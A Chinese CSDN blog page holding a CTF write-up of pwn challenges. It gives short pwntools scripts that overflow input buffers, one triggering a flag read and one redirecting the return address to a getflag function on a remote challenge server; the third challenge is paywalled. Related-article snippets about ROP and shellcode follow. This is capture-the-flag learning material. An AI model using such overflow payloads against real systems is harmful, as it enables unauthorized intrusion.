Pwn

最新推荐文章于 2025-07-30 11:57:36 发布
最新推荐文章于 2025-07-30 11:57:36 发布
阅读量2.5k 收藏 13
点赞数 3
CC 4.0 BY-SA版权
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/bluestar628/article/details/81007516
本文详细介绍了如何通过栈溢出利用技术,结合动态链接库函数_dl_make_stack_executable,使栈变得可执行,并布置shellcode以获取shell。首先通过IDA分析程序,发现存在栈溢出,然后逐步构造ROP链,包括改变_stack_prot值,设置eax为libc_stack_end地址,调用_dl_make_stack_executable函数,最后插入shellcode并寻找跳转到栈的指令完成执行。

Pwn1

拿到程序IDA分析


发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系

所以利用代码如下:

from pwn import *
p = remote ("139.224.220.67" ,30004)
payload = 'a'*0x501
p.sendline(payload)
p.interactive()


Pwn2

打开IDA分析,是一个经典的栈溢出,scanf输入的时候并没有对长度进行限制,因此可以一直覆盖到返回地址

那么我们可以把返回地址覆盖为题目中给出的getflag函数即可。



所以利用代码如下:

from pwn import *
p = remote ("139.224.220.67" ,30006)
e=ELF("chall")
payload = 'a'*0x108
payload += 'a'*0x4
payload += p32(e.symbols['getflag'])
p.sendline(payload)
p.interactive()


Pwn3

IDA分析一下


发现就是分配了一块内存,地址为0xdeadb000,然后从输入流读入数据到该地址,然后执行该地址的内容。

即程序会执行我们输入的机器码。

最低0.47元/天 解锁文章

新学期VIP享超值加赠
基于zio编写PWN代码
ChuMeng1999的博客
12-09 2140
目录预备知识一、CTF PWN基础知识二、zio简介1.导入zio库2.与远程服务器建立网络连接3.从远程服务器读取数据4.向远程服务器发送数据5.与服务器建立shell交互三、pip四、checksec脚本实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 一、CTF PWN基础知识 《CTF PWN进阶训练》系列实验要求实验者已经了解如下相关的基础知识,包括: 1.理解基本的汇编指令及语句; 2.掌握IDA Pro的基本用法; 3.熟悉网络编程(socket)基本原理; 4.编写简单的Python
pwn中的万能gadget函数
Assassin
04-08 812
pwn的过程中,有一些一般程序都有的万能gadget函数,特别时程序在初始化的时候一般会有下面函数,就为构造ROP链提供了原材料 _init _start call_gmon_start deregister_tm_clones register_tm_clones __do_global_dtors_aux frame_dummy __libc_csu_init __libc_csu_fini _fini _dl_runtime_resolve __libc_csu_init .text:000000
PWN GADGET 入门
baidu_39617633的博客
09-25 1060
PWN GADGET 入门 checksec ret2syscall 拖入相应的IDA 3. playload构造 漏洞点 gets() 无canary,开启栈保护(NX ENABLE),无法直接将shellcode写入栈,需要gadget 计算padding IDA反编译直接查看 距离ebp为0x64,根据返回地址在ebp下一个字长处,所以总padding为0x64+0x4 但是失败。IDA有坑! GDB查看栈 填充0x86个a 使用gdb.attach()下断点至g
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
QIANDXX的博客
07-30 758
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
PWN(一)
weixin_44169596的博客
01-21 3888
1. 安装pwntools工具: pwntools是什么? pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,基本涵盖了pwn题利用脚本所需要的各种工具。 安装过程: sudo apt install python3-pip sudo python3 -m pip install --upgrade --force pip sudo pip install setuptools==33.1.1 sudo pip3 install
pwn-shellcode执行
GalaxySpaceX的博客
08-23 1532
pwn-shellcode执行
alarm函数在pwn中的一些利用
Morphy_Amo的博客
03-19 754
文本整理了alarm函数在pwn中的一些应用
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
(源码)基于Python语言的PS4系统破解工具WKY Pwn.zip
11-22
# 基于Python语言的PS4系统破解工具WKY Pwn ## 项目简介 WKY Pwn是一个基于Python语言开发的用于破解PS4系统的工具。该项目由一系列脚本组成,通过利用PlayStation 4的PPPoE协议漏洞实现远程代码执行(RCE)。该...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
题目源码2024年强网杯全国网络安全挑战赛 PWN题目baby-heap源码
11-07
2024年强网杯全国网络安全挑战赛是针对网络安全爱好者的一次盛会,尤其是PWN题目,这类题目往往要求参赛者利用软件中的漏洞,获取或提升权限。本次提供的“baby-heap”源码,很可能是一个针对堆内存管理的漏洞利用...
xnuca2018-pwn-0gadget
sunrise的博客
11-24 851
off-by-one double free,uaf fast-bin-attack 函数功能: add函数中有一个off-by-one溢出,可以修改下一个本数组的堆指针的最后一个字节,使其指向最后一字节为'\x00'的堆块 用off-by-one修改后,free这个unsortedbin堆块,然后显示其中的fd,得到libc基址 同理,用do...
PWN入门之通用gadgets
weixin_44681716的博客
04-09 3169
实验目的 针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。 实验文件 这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。 ...
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1825
pwn练习1-ret2syscall(ROP-gadget)
[pwn]ROP:使用通用gadget
热门推荐
Breeze的博客
07-06 1万+
[详细] ROP:使用通用gadget 这次试用的是LCTF2016的试题pwn100,参考i春秋上的这篇文章 在这里详细讲解如何利用通用gadget构造一个复杂的ROP链。 通用gadget介绍 介绍一段通用的gadget,通常出现在64elf位文件的__libc_csu_init函数中(截图来自本程序pwn100,很多64位二进制文件都有): 这其中有三段gadget,第一段是 pop ...
PWn基本工具安装
weixin_61804402的博客
05-27 414
main_arena_offset——一个简单的 shell 脚本,用于获取给定 libc 的偏移量。one_gadget ——一键找到 shell 地址。ROPgadget——ROP命令找到的gadget。checksec ——检测文件保护机制。LibcSearcher——代替。在github上克隆pwndbg。IDA Pro——静态代码分析。pwndbg——动态调试。
pwn guess 中利用fork
weixin_44954083的博客
07-11 668
checksec 查看保护机制 guess 只有一个保护, 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的地址(也就是栈的地址),为什么泄漏environ:https://www.jianshu.com/p/cc9d09a3f65f 有详细的解释 什么是environ? ...
pwn三连
qq_43613144的博客
07-24 394
‘’
pwn
03-19
### Pwn 的定义与背景 Pwn 是网络安全领域中的一个重要术语,在渗透测试和漏洞利用方面具有广泛的应用。它通常指通过发现并利用软件或系统的安全漏洞,从而获得未经授权的访问权限或控制权的行为[^1]。 #### 技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值